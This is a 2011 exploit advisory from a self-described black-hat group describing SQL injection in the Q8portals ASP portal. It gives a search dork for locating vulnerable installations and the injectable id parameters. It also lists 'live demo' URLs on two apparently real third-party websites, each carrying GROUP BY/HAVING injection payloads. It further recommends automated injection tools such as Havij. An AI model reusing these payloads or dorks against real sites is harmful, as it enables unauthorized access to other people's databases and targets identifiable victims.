Q8portals [asp] SQL Injection Vulnerability



EKU-ID: 246 CVE: OSVDB-ID:
Author: Net.Edit0r Published: 2011-05-17 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


=========================================================================
Q8portals [asp] SQL Injection Vulnerability
==========================================================================

[+]Title :.......Q8portals [asp] SQL Injection Vulnerability
[+]Author :......Net.Edit0r
[+]Tested on :...Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by Net.Edit0r
[~] Team: Black Hat Group
[~] Contact: Black.hat.tm@Gmail.Com
[~] Home: http://Black-HG.Org & http://Security-War.Com
[~] Vendor: http://www.Q8portals.com
[~] Category:: [webapps]

==========ExPl0iT3d by Net.Edit0r==========

[+] DORK: intext:Powered by: q8portals.com


[+] Description: You start using the command having 1 = 1 - name of
first table to find And more using the command (order by )other name
you will find tables

[ I ].   SQL Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[+++] Important: For Sql Injection easily program such Havij and use Hmei7


[P0C]:  http://127.0.0.1/portal/articles_en.asp?id= [ SQL INJECTION]

[P0C]:  http://127.0.0.1/portal/contents_en.asp?id=4 [ SQL INJECTION]


[L!v3 D3m0's]:

http://www.alowaidhoney.com/portal/articles_en.asp?id=-4%20group+by+ARTICLES.ARTICLE_ID,ARTICLES.ARTICLE_TITLE_AR,ARTICLES.ARTICLE_DESC_AR+having%201=1--

http://alghanimkw.com/portal/contents_en.asp?id=4%20group+by+CONTENTS.CONTENT_ID,CONTENTS.CONTENT_NAME_AR,CONTENTS.CONTENT_DESC_AR--


[+] TIME TABLE:

12 May 2011 - Vulnerability discovered.
13  May 2011   - Advisory released.


===========================================================================================
[!] Black Hat Group ./Iranian HackerZ
===========================================================================================
[!] MaiL: Black.Hat.tm@Gmail.Com ~ Net.Edit0r@Att.Net
===========================================================================================
[!] Greetz To : DarkCoder | p3nt3st3r | Amir-MaGiC | 3H34N | H3x |
D3adlY & All Iranian HackerZ
===========================================================================================
[!] Spec Th4nks:  HUrr!c4nE   | Virangar | B3hz4d |  M4Hd1 | Mr.Xhat |
Immortal Boy |
__SENATOR__ | And All My Friendz
===========================================================================================
[!] Persian Gulf 4 Ever
I Love Iran And All Iranian People
===========================================================================================